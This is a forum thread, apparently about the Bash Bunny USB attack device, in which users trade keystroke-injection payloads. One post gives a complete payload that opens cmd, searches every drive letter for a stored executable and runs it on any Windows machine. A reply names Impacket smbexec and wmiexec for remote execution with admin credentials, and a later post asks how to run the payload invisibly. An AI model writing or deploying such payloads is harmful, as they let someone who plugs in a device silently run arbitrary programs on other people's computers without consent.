hoppler Posted November 26, 2018 Share Posted November 26, 2018 Hello. I have following payload: LED SETUP ATTACKMODE HID STORAGE GET SWITCH_POSITION LED ATTACK if [ -f "/root/udisk/payloads/${SWITCH_POSITION}/my_script.txt" ]; then QUACK ${SWITCH_POSITION}/my_script.txt LED FINISH fi Well, my_script.txt get's executed. Great. But now my question: Why it is'nt working if I change "my_script.txt" to "my_script.exe". if [ -f "/root/udisk/payloads/${SWITCH_POSITION}/my_script.exe" ]; then QUACK ${SWITCH_POSITION}/my_script.exe LED FINISH fi Or is there a nother easy way to execute the .exe file without going through powershell or cmd? Maybe through Ethernet??? An example or actually an answer would be great. Maybe Darren could help??? Thanks in advance Link to comment Share on other sites More sharing options...
PoSHMagiC0de Posted November 26, 2018 Share Posted November 26, 2018 Negative. For the victim to execute the exe, it will have to be ran by the victim. That means you have to type it out the command to run it with Quack or have it ran inside a batch, cmd or powershell console. If you know the password of the machine, know firewall for SMB or WMI is done and the AccountTokenFilterPolicy is set to 1 or the machine is on a domain and the account has admin you could use impackets. smbexec.py or wmiexec.py to do it but you will need admin creds to use. What you were doing above is trying to type out the exe. Quack doesn't run, it types. The txt works because it is a text file so it just typed it out. The exe will not or if it does it will be a bunch of binary data being typed out. So, network way requires admin credentials if you do not want to type out a stager. Link to comment Share on other sites More sharing options...
hoppler Posted November 28, 2018 Author Share Posted November 28, 2018 Wow, thank you for this straight answer. Now I get the picture. But I figured out a way to run an executable through command - even without admin rights. Maybe somebody could use it. Here is my solution: Note: if you need different keyboard layout, add this: DUCKY_LANG gb - or anything else Payload.txt: ATTACKMODE HID STORAGE LED R SLOW Q GUI r Q DELAY 500 Q STRING cmd Q ENTER Q DELAY 500 Q STRING "for /l %a in (0) do ( for %a in (A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z) do if exist %a:/my_folder/my.exe (start %a:/my_folder/my.exe & exit) )" Q ENTER LED OFF Weel, it's actually very simple - which runs on any Windows Machine. How does it work? 1. Create a folder on the BB Storage or any other Storage with the Name: my_folder (you can name it like you want) 2. Put an executable File in the above folder (e.g. my.exe). 3. Copy the above Code into the payload.txt of switch 1 or switch 2. 4. Thats's all. As soon as you insert the BB it starts the HID Attack. The BB opens a cmd window and runs an infinty loop searching the file. If the the file exists it executes the exe file and exits the cmd window. Simple but effective. Ok, that's one way to achive my goal, running an executable from an external storage. But now I would like to know how you guys would run an executable from the BB. Any attack mode is allowed - so please give me your ideas and payloads. It would be great if OS starts from Windows XP on, but from Windows 7 on is fine, too. Let's make a challenge out of this! Because Many people, many toughts, results in many solutions. Hope you guys have a great day!!! Link to comment Share on other sites More sharing options...
Zwite Posted November 15, 2019 Share Posted November 15, 2019 The file explorer keeps popping up after i try running the payload on switch 1. I can't figure out a way to make it stop doing that. Also is there a way to make it run it's payload invisibly? Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.